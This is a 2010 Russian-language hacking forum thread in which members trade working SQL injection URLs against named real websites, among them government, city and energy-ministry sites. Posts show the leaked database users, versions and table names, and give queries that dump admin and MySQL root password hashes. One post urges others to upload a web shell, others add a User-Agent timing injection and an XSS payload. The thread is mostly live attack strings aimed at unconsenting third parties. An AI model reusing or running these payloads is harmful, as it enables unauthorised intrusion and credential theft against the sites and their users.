SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    Code:
    http://www.planningtree.com/index.php?page=user&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5+--+
    Username: plantree_admin@localhost
    Database: planningtree_db
    Version: 5.0.45-Debian_1ubuntu3.1-log

    Есть таблица users.

    Пример вывода пользователя с хешом:

    Code:
    http://www.planningtree.com/index.php?page=user&id=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5+from+users+limit+5,1--+
    Code:
    http://www.nl-fotostudio.com/view.php?id=-1+union+select+1,unhex(hex(concat_ws(0x3a,user(),database(),version()))),3,4,5,6,7,8,9,10,11,12--
    Username: [email protected]
    Database: usr_s001w6_1
    Version: 4.1.13-log
     
    #11561 root_sashok, 23 Mar 2010
    Last edited: 23 Mar 2010
  2. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Code:
    http://monne.ru/?show=catalog&id=-19+union+select+1,2,version%28%29,4+--+
    Version: 4.1.22-standard
    User: monneru_adm@localhost
    Database: monneru_main

    Code:
    http://www.veorkf.ru/catalog/dog.php?screen=1&id=-19+union+select+version%28%29,2,3,4,5,6+--+
    Version: 4.1.25-LOG
    User: VEORKFR5_VEO@LOCALHOST
    Database: VEORKFR5_VEO
     
    #11562 CyberHunter, 23 Mar 2010
    Last edited: 23 Mar 2010
  3. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    Code:
    http://theinterculturalinstitute.com/english/photogallery/view.php?id=74+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12--
    Username: web152@localhost
    Database: usr_web152_1
    Version: 5.0.51a-3ubuntu5.1
     
  4. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    India IT Hub :D компьютерная тематика :D

    есть таблицы:
    З.Ы file_priv:Y, ну залейте им кто-нибудь шелл)
     
    #11564 daniel_1024, 23 Mar 2010
    Last edited: 23 Mar 2010
  5. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    Code:
    http://www.terreinbeveiliging.com/index.php?action=text&id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49--
    Username: [email protected]
    Database: alfabit_gps
    Version: 5.0.51a-community

    Целых 49 колонок, понятия не имею, что там может быть.

    Вывод, по-наркомански, запрятан в тег "alt" к битому изображению :eek: :D

    [​IMG]

    Username: tevet@localhost
    Database: webs
    Version: 5.0.75-1
     
    #11565 root_sashok, 23 Mar 2010
    Last edited: 23 Mar 2010
    2 people like this.
  6. -=Razor=-

    -=Razor=- Member

    Joined:
    20 Dec 2008
    Messages:
    30
    Likes Received:
    29
    Reputations:
    3
    Code:
    http://globalbass.nl/dj.php?id=-1+union+select+1,password,3,4,5,6,7,user,9,10,11,12,13,14,15,16,17+from+mysql.user--
    version: 4.0.16-nt-log
    user: root@localhost
    database: globaltrance

    ---------

    Code:
    http://www.concept-m.fr/dj.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13--
    Version: 5.0.90-log 8
    User: [email protected] 8
    Database: conceptm_minus 8
    -------

    Code:
    ttp://www.salsaband.nl/salsa-dj.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10+from+users--
    Code:
    http://www.salsaband.nl/salsa-dj.php?id=-1+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10+from+information_schema.columns+where+table_name=0x7573657273+limit+1,1
    Code:
    http://www.salsaband.nl/salsa-dj.php?id=-1+union+select+1,2,3,concat(login,0x3a,pw),5,6,7,8,9,10+From+users+limit+1,1--
    Version: 5.0.77
    Database: salsaban
    User: salsaban@localhost
    ---------
    Code:
    http://www.letsgetextreme.com/review-band-db.php?id=1+union+select+concat(user_pass,0x3a,user_name),2,3,4+from+users/*

    version: 4.1.21-community-nt
    -----

    Code:
    http://www.orionicon.com/embacons-db.php?id=1+union+select+COLUMN_NAME+from+information_schema.columns+where+table_name=0x61646D696E
    Code:
    http://www.orionicon.com/embacons-db.php?id=1+union+select+concat(admin,0x3a,password)+from+admin+limit+1,1--
    user: n [email protected]
    database: 432555_studypages
    Version: 5.0.77-log
     
    #11566 -=Razor=-, 23 Mar 2010
    Last edited: 23 Mar 2010
    2 people like this.
  7. artel87

    artel87 New Member

    Joined:
    19 Jan 2010
    Messages:
    3
    Likes Received:
    3
    Reputations:
    3
    Code:
    http://atv.by/gallery.php?id=-10+union+select+1+--+
    version: 5.0.67.d7-ourdelta-log
    Base: atvby
    User: [email protected]
    Code:
    http://www.obitr.by/page.php?form_id=512+union+select+1,2,3,4,5+--+
    version: 5.0.51a-24+lenny2
    Base: ruralbelarusby
    User: ruralbelarusby@localhos
     
  8. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    .GOV ресурс
    MySQL 5.0.84-percona-highperf-log
    admin::id, user_name, password | and | general_administrator::user_name, password | and| poll_user:: user_id, username, userpass
    так же интересные резалты из таблицы poll_user
    admin panels:
    пускает спокойно, но на монгольском я мало что понял=( забирайте
     
    1 person likes this.
  9. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    Code:
    http://jogharta.com/produit.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4--
    Username: jogharta@localhost
    Database: jogharta
    Version: 5.0.44-log

    Code:
    http://www.safira.org.ua/index.php?action=product&topcat=2&item=-1+union+select+concat_ws(0x3a,user(),database(),version())--
    Очень странный юзернейм.

    Username: '@localhost
    Database: safirao_safira
    Version: 5.0.89-community-log

    Code:
    http://www.maarav.org.il/classes/PUItem.php?lang=HEB&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8--
    Username: maaravo_maarav5@localhost
    Database: maaravo_maarav5
    Version: 5.0.89-community-log

    Таблицы:
    Code:
    authors
    authors_lang
    banner
    categories
    categories_lang
    daily_image	
    daily_image_topic
    daily_image_topic_lang
    events
    events_status
    flash_flood_items
    forum_categories
    forum_entries
    forum_settings
    forum_userdata
    forum_useronline	
    item_status	
    items	
    languages	
    link_type	
    media_types	
    news	
    news_status	
    readers_comments	
    sub_categories
    sub_categories_lang	
    user_groups	
    users
    Пароли выводит, переменную имени не подобрал. user, username, login, name — не катят.
     
    #11569 root_sashok, 23 Mar 2010
    Last edited: 24 Mar 2010
  10. Red_EYEs

    Red_EYEs Member

    Joined:
    7 Aug 2009
    Messages:
    32
    Likes Received:
    12
    Reputations:
    11
    fid.su

    fid.su - организация ответственная за зону .su. Инекция с insert'ом
    Code:
    User-Agent: BROWSER',ip=2130706433,recdate="SECURITY HOLE" or IF(SUBSTRING((SELECT VERSION()), 1, 1)=4, 1, BENCHMARK(5999999,MD5(NOW())))#
    версия 4ая, остальное влом + страшно
     
    #11570 Red_EYEs, 24 Mar 2010
    Last edited: 24 Mar 2010
    3 people like this.
  11. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    Code:
    http://www.nzclaytarget.org.nz/clubs/club_page.php?id=1+union+select+1,2,3,user(),database(),version(),7,8,9,10,11,12,13--
    Username: [email protected]
    Database: nzclaytarget
    Version: 5.0.86-log

    Code:
    http://pla.deptan.go.id/sub_content.php?p=renstra&id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6--
    Username: adminpla@localhost
    Database: pla_db
    Version: 5.0.45-standard-log

    Code:
    http://www.vales.by/catalog.php?action=show_object&id=109+union+select+concat_ws(0x3a,user(),database(),version())--
    Username: '@localhost :eek: :confused:
    Database: valesby
    Version: 5.0.90
     
    #11571 root_sashok, 24 Mar 2010
    Last edited: 24 Mar 2010
    1 person likes this.
  12. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    Моя первая)
    отдельное спасибо Pashkela и -=Razor=- за помощь.

    Code:
    http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=-1+union+select+1,user(),3,database(),5,6,7,8,9,10+from+mysql.user
    Username: root@localhost
    Database: skyscout
    Version: 4.1.22-community-nt
     
    6 people like this.
  13. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    Code:
    http://netp.us/dev_news_detail.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8--
    Username: [email protected]
    Database: db249050689
    Version: 4.0.27-max-log (08-00-2000)

    Code:
    http://www.ci.bremerton.wa.us/display.php?id=1+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9,10,11,12,13,14--
    Username: remcity@localhost
    Database: bremcity
    Version: 5.0.51a-3ubuntu5.4

    [​IMG]

    Сегодня прямо квест, "найди вывод" :D

    Вторая часть квеста состоит в том, что нужно из исходника выкопать названия таблиц :D

    Code:
    articles
    events
    menus
    onlinepoll
    pictures
    quicklinks
    subsections
    users
    tbl_COBPARCELS
    tbl_CityAddresses
    tbl_ISUs
    tbl_SITUS
    columns_priv
    db
    func
    help_category
    help_keyword
    help_relation
    help_topic
    host
    incidentlist
    landlordlist
    proc
    procs_priv
    tables_priv
    time_zone
    time_zone_leap_second
    time_zone_name
    time_zone_transition
    time_zone_transition_type
    user
    user_info
    Code:
    http://www.greenville.ms.us/calendar/eventdisplay.php?id=93+union+select+concat_ws(0x3a,user(),database(),version()),2,3--
    Username: [email protected]
    Database: calendar_greenville_ms_us
    Version: 5.0.90-log

    Code:
    http://adhonep.us/index.php?id_version=1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6--
    Username: adhonepu_root@localhost
    Database: adhonepu_adhonep
    Version: 5.0.51a-standard

    Вывод в ссылке, ссылка — белым шрифтом по белому фону. При наводке меняет цвет :eek:

    Code:
    http://www.ifph.us/learning/research.php?ID=1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8--
    Username: [email protected]
    Database: heirraiser
    Version: 5.0.67.d7-ourdelta-log

    Code:
    http://www.preparingheirs.us/events/index.php?ID=2+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11--
    Эта инъекция общая с предыдущей, т.е. Username, Database и Version — те же.
     
    #11573 root_sashok, 24 Mar 2010
    Last edited: 24 Mar 2010
    2 people like this.
  14. us_capone

    us_capone New Member

    Joined:
    2 Dec 2008
    Messages:
    3
    Likes Received:
    2
    Reputations:
    1
    Сайт МИНСКЭНЕРГО - Министерство энергетики Беларуси

    database: tenders
    version: 5.0.45-community-nt
    user: tenders@localhost
     
    2 people like this.
  15. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    Еще парочка US.

    Code:
    http://globaltechnicalsolutions.us/catalog/index.php?manufacturers_id=1+union+select+concat_ws(0x3a,user(),database(),version())--
    Username: [email protected]
    Database: db2763
    Version: 4.0.27-max-log

    Code:
    http://www.crownparts.us/article.php?id=1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8--
    Username: [email protected]
    Database: db18917_crownparts
    Version: 4.1.25-Debian_mt1
     
    #11575 root_sashok, 24 Mar 2010
    Last edited: 24 Mar 2010
    2 people like this.
  16. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    6 ветка edu
    Version: 6.0.3-alpha-community
    User: yabi_reader@localhost
    Dbname: yabi
     
    1 person likes this.
  17. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    Code:
    http://www.cisci.net/user_info.php?lang=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8--
    Username: [email protected]
    Database: ci000073_0001
    Version: 5.0.67inode

    Code:
    http://www.centraldev.net/post.php?id=46+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10--
    Username: [email protected]
    Database: centraldev
    Version: 5.0.67-userstats-log

    Code:
    http://www.embedded-projects.net/index.php?page_id=260+union+select+concat_ws(0x3a,user(),database(),version())--
    Username: '@localhost :eek:
    Database: eprooshop
    Version: 5.1.37-1ubuntu5.1

    Code:
    http://kchbo.chov.net/index.php?action=ulist&ID=4575+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9--
    Username: belgicak@localhost
    Database: belgicak
    Version: 4.1.20
     
    #11577 root_sashok, 24 Mar 2010
    Last edited: 24 Mar 2010
  18. sqlinjector

    sqlinjector Member

    Joined:
    31 Dec 2009
    Messages:
    20
    Likes Received:
    6
    Reputations:
    0
    Называется "детский поисковик" (pr4, ТИЦ 240). отрыл 3 таблицы юзеров, в том числе и с помощью SIPTа.

    HTML:
    adrev_users -> 0x61647265765F7573657273
    siuser -> 0x736975736572
    tblUsers -> 0x74626C5573657273
    
    нашел логин+пасс, по идее к админке, но вбиваю в http://www.agakids.ru/admin и нихрена не подходит.

    HTML:
    http://www.agakids.ru/shop/index.php?rub_id=7331&tov_id=-46184'+union+select+group_concat(database(),0x3a,user(),0x3a,version()+separator+0x0b)+--+
    Попробуйте, может кому-нить и поможет!
     
  19. -=Razor=-

    -=Razor=- Member

    Joined:
    20 Dec 2008
    Messages:
    30
    Likes Received:
    29
    Reputations:
    3
    Code:
    http://old.powerkiting.cz/db/db.php?id=1+union+select+version()/*
    Version: 4.1.22-LOG
    User: [email protected]
    Database: KUBISTAJ

    Code:
    http://www.phusinghealth.com/print/dm.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49--
    Version: 4.1.22-community-nt
    User: phusinghealth@localhost
    Database: phusinghealth

    Code:
    http://www.rubenspaiva.com/oxcosmeticos/n.php?id=1+union+select+1,version(),3,4--
    Version: 5.0.89

    Code:
    http://www.skrigan.info/figura/news/nw.php?id=-1+union+select+1,2,version(),4,5,6--
    Version: 5.0.75
    User: [email protected]
    database: b16366

    Code:
    http://www.paradise.reline.ru/stati_r2/na.php?id=-1+union+select+1,version(),3,4,5,6,7,8--
    Version: 4.1.21


    Code:
    http://www.bizned.biz/articles/na.php?id=-1+union+SELECT+1,2,3,4,5,version(),7,8--
    Version: 4.1.21
    dataase: articles
    User: root@localhost

    Code:
    http://biz-s.com/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
    Vesrion: 4.1.21
    User: root@localhost
    Database: articles
    Database: articles


    Code:
    http://www.swingingapestudios.com/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
    Vesrion: 4.1.21
    User: root@localhost
    Database: articles
    Database: articles


    Code:
    http://dpolevoy.com/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
    Version: 4.1.21
    Database: articles
    User: root@localhost

    Code:
    http://www.dwwork.com/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
    Version: 4.1.21
    Database: articles
    User: root@localhost


    Code:
    http://www.electrickidsindia.com/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
    Version: 4.1.21
    Database: articles
    User: root@localhost

    Code:
    http://www.domovladelec.com/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
    Version: 4.1.21
    Database: articles
    User: root@localhost

    Code:
    http://www.galaxyintel.com/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
    Version: 4.1.21
    Database: articles
    User: root@localhos

    Code:
    http://sovety.info/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
    Version: 4.1.21
    Database: articles
    User: root@localhost

    Code:
    http://spb-nets.ru/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
    Version: 4.1.21
    Database: articles
    User: root@localhost

    Code:
    http://www.c913.net/articles/na.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8+from+mysql.user+limit+1,1--
    Version: 4.1.21
    Database: articles
    User: root@localhost

    Code:
    http://www.pmdesign.ru/nv.php?id=-1+union+select+1,2,3,concat(login,0x3a,password),5+from+users+limit+0,1--
    Version: 5.0.51a-24+lenny2-log
    user: [email protected]
    database: pmv_pmd

    Code:
    http://www.netc99.com/all_parameter/item-nb.php?id=-1%27+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables/*
    Version: 5.0.45-community-nt
    database: yaowumaonetc
    user: yaowumaonetc@localhost

    Code:
    http://www.medienturm.at/mt.php?id=1&subm=0&_pid=-323+union+SELECT+1,2,3,4,concat(name,0x3a,password),6,7,8,9,10,11,12,13+from+tab_users+limit+1,1--
    Version: 5.0.51a-24+lenny1-log

    Code:
    http://www.diffondi.it/ma.php?id=-1+union+select+1,version()--
    Version: 4.1.22
    database: diffondi
    user: diffondi@localhost

    Code:
    http://ls.tjpro.net/mf.php?id=-1+union+select+1,2,3,4,5,user+from+mysql.user--
    version: 5.1.28-rc
    User: root@localhost
    database:livesound

    Code:
    http://www.anthemflag.com/articles/mx.php?id=-1+union+SELECT+concat(user,0x3a,password),2+from+mysql.user+limit+0,1--
    version: 4.1.22-standard-log

    Code:
    http://www.gsi.be/mc.php?id=1+union+select+1,Concat(user,0x3a,password),3,4,5,6,7,8,9,10+from+mysql.user--
    Version: 4.1.21-community-nt

    Code:
    http://selecthobby.com.hk/mv.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13--
    version: 5.0.51a-3ubuntu5.4


    Code:
    http://www.marketingaction.com/mm.php?id=-1+union+select+1,version(),3--
    Version: 5.0.89-community
    User: maction_cp@localhost
    database: maction_cp

    Code:
    http://www.nakupujete.cz/images/sms/vyhry/canon-eos-500D-objektiv-efs-18-55-mm.php?id=-1+union+select+1,2,3,4,concat(user_name,0x3a,pwd),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users+limit+0,1--
    Version: 5.1.32

    Сегодня немного разошелся =)
     
    3 people like this.
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.lupus.am/ru/main.php?page=about&lid=-2+union+select+concat(user(),char(58),version(),char(58),database())

    user() : bsam_lupus@localhost:

    version() : 5.1.45-log

    database() : bsam_lupusdata

    +XSS

    http://www.lupus.am/ru/main.php?page=about&lid=-2+union+select+<script>alert()</script>
     
    _________________________
Thread Status:
Not open for further replies.